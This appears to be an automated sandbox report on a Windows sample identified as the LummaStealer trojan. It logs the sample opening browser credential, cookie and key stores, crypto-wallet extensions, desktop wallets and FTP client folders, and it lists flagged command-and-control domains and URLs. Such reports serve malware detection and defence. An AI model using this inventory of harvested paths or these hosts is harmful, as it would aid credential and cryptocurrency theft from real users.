      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\prefs.jsJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cookies.sqliteJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\formhistory.sqliteJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\key4.dbJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
      Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
      Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
      Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
      Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\IZMFBFKMEBJump to behavior
      Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOHJump to behavior
      Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
      Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
      Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\PWZOQIFCANJump to behavior
      Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\QFAPOWPAFGJump to behavior
      Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\SNIPGPPREPJump to behavior
      Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\SNIPGPPREPJump to behavior
      Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
      Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\IZMFBFKMEBJump to behavior
      Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOHJump to behavior
      Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
      Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\PWZOQIFCANJump to behavior
      Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\QFAPOWPAFGJump to behavior
      Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\SNIPGPPREPJump to behavior
      Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
      Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\IZMFBFKMEBJump to behavior
      Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOHJump to behavior
      Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
      Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\PWZOQIFCANJump to behavior
      Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\QFAPOWPAFGJump to behavior
      Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\SNIPGPPREPJump to behavior
      Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
      Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\IZMFBFKMEBJump to behavior
      Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOHJump to behavior
      Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
      Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\PWZOQIFCANJump to behavior
      Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\QFAPOWPAFGJump to behavior
      Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\SNIPGPPREPJump to behavior
      Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
      Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\IZMFBFKMEBJump to behavior
      Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOHJump to behavior
      Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
      Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\PWZOQIFCANJump to behavior
      Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\QFAPOWPAFGJump to behavior
      Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\SNIPGPPREPJump to behavior
      Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
      Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\IZMFBFKMEBJump to behavior
      Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOHJump to behavior
      Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
      Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\PWZOQIFCANJump to behavior
      Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\QFAPOWPAFGJump to behavior
      Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\SNIPGPPREPJump to behavior
      Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\IZMFBFKMEBJump to behavior
      Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOHJump to behavior
      Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
      Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\PWZOQIFCANJump to behavior
      Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\QFAPOWPAFGJump to behavior
      Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\SNIPGPPREPJump to behavior
      Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
      Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
      Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOHJump to behavior
      Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
      Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\PWZOQIFCANJump to behavior
      Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\QFAPOWPAFGJump to behavior
      Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\SNIPGPPREPJump to behavior

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: 00000000.00000002.1151008849.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.1046421738.0000000005400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
      Windows Management Instrumentation      		1
      DLL Side-Loading      		1
      Process Injection      		44
      Virtualization/Sandbox Evasion      		2
      OS Credential Dumping      		851
      Security Software Discovery      		Remote Services31
      Data from Local System      		1
      Encrypted Channel      		Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
      DLL Side-Loading      		1
      Process Injection      		LSASS Memory44
      Virtualization/Sandbox Evasion      		Remote Desktop ProtocolData from Removable Media2
      Non-Application Layer Protocol      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)2
      Obfuscated Files or Information      		Security Account Manager2
      Process Discovery      		SMB/Windows Admin SharesData from Network Shared Drive113
      Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
      Software Packing      		NTDS1
      File and Directory Discovery      		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      DLL Side-Loading      		LSA Secrets223
      System Information Discovery      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1654467 Sample: random.exe Startdate: 02/04/2025 Architecture: WINDOWS Score: 100 10 rodformi.run 2->10 12 pki-goog.l.google.com 2->12 14 2 other IPs or domains 2->14 18 Suricata IDS alerts for network traffic 2->18 20 Found malware configuration 2->20 22 Antivirus detection for URL or domain 2->22 24 7 other signatures 2->24 6 random.exe 2->6         started        signatures3 process4 dnsIp5 16 rodformi.run 172.67.197.67, 443, 49681, 49682 CLOUDFLARENETUS United States 6->16 26 Detected unpacking (changes PE section rights) 6->26 28 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 6->28 30 Query firmware table information (likely to detect VMs) 6->30 32 9 other signatures 6->32 signatures6

      Screenshots

      Download Video

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      random.exe60%VirustotalBrowse
      random.exe69%ReversingLabsWin32.Trojan.LummaStealer
      random.exe100%AviraTR/Crypt.XPACK.Gen
      SAMPLE100%Joe Sandbox ML

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      https://rodformi.run/aUosozc100%Avira URL Cloudmalware
      https://rodformi.run:443/aUosozages100%Avira URL Cloudmalware
      https://rodformi.run/cV100%Avira URL Cloudmalware
      https://rodformi.run/4100%Avira URL Cloudmalware
      https://rodformi.run/d100%Avira URL Cloudmalware
      https://rodformi.run:443/aUosoz100%Avira URL Cloudmalware
      https://rodformi.run/1100%Avira URL Cloudmalware
      https://rodformi.run:443/aUosozc100%Avira URL Cloudmalware

      Domains and IPs

      Download Network PCAP: filteredfull

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      bg.microsoft.map.fastly.net
      		199.232.214.172
      		truefalse
        		high
        rodformi.run
        		172.67.197.67
        		truefalse
          		high
          pki-goog.l.google.com
          		142.250.80.35
          		truefalse
            		high
            c.pki.goog
            		unknown
            		unknownfalse
              		high

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              starcloc.bet/GOksAofalse
                		high
                spacedbv.world/EKdlskfalse
                  		high
                  metalsyo.digital/opsafalse
                    		high
                    navstarx.shop/FoaJSifalse
                      		high
                      https://rodformi.run/aUosozfalse
                        		high
                        galxnetb.today/GsuIAofalse
                          		high
                          targett.top/dsANGtfalse
                            		high
                            advennture.top/GKsiiofalse
                              		high
                              rodformi.run/aUosozfalse
                                		high
                                NameSourceMaliciousAntivirus DetectionReputation
                                https://duckduckgo.com/ac/?q=random.exe, 00000000.00000003.1066641344.0000000005FD0000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://rodformi.run/4random.exe, 00000000.00000003.1127961222.00000000017D1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1144142121.00000000017D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: malware
                                  		unknown
                                  https://rodformi.run/aUosozcrandom.exe, 00000000.00000003.1127961222.00000000017D1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1144142121.00000000017D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: malware
                                  		unknown
                                  https://rodformi.run/1random.exe, 00000000.00000003.1127961222.00000000017D1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1144142121.00000000017D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: malware
                                  		unknown
                                  https://www.marriott.com/default.mi?utm_source=admarketplace&utm_medium=cpc&utm_campaign=Marriott_Prrandom.exe, 00000000.00000003.1103094774.00000000017E5000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1103039221.00000000017DF000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=random.exe, 00000000.00000003.1066641344.0000000005FD0000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://crl.rootca1.amazontrust.com/rootca1.crl0random.exe, 00000000.00000003.1093278641.0000000005FC5000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://ac.ecosia.org?q=random.exe, 00000000.00000003.1066641344.0000000005FD0000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15e498ec2b39921665a1fbc954bff40a8106629178eadc64random.exe, 00000000.00000003.1103094774.00000000017E5000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1103039221.00000000017DF000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=random.exe, 00000000.00000003.1066641344.0000000005FD0000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://ocsp.rootca1.amazontrust.com0:random.exe, 00000000.00000003.1093278641.0000000005FC5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brrandom.exe, 00000000.00000003.1094204158.00000000060A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://contile-images.services.mozilla.com/5b4DH7KHAf2n_mNaLjNi1-UAoKmM9rhqaA9w7FyznHo.10943.jpgrandom.exe, 00000000.00000003.1103094774.00000000017E5000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1103039221.00000000017DF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://rodformi.run:443/aUosozagesrandom.exe, 00000000.00000003.1124307891.0000000001744000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1144094054.0000000001744000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1150727353.0000000001744000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000002.1151651944.0000000001744000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    https://www.google.com/images/branding/product/ico/googleg_alldp.icorandom.exe, 00000000.00000003.1066641344.0000000005FD0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://www.ecosia.org/newtab/v20random.exe, 00000000.00000003.1066641344.0000000005FD0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&ci=1696497267574.12791&key=1696497267400700random.exe, 00000000.00000003.1103094774.00000000017E5000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1103039221.00000000017DF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgrandom.exe, 00000000.00000003.1103094774.00000000017E5000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1103039221.00000000017DF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://x1.c.lencr.org/0random.exe, 00000000.00000003.1093278641.0000000005FC5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://x1.i.lencr.org/0random.exe, 00000000.00000003.1093278641.0000000005FC5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
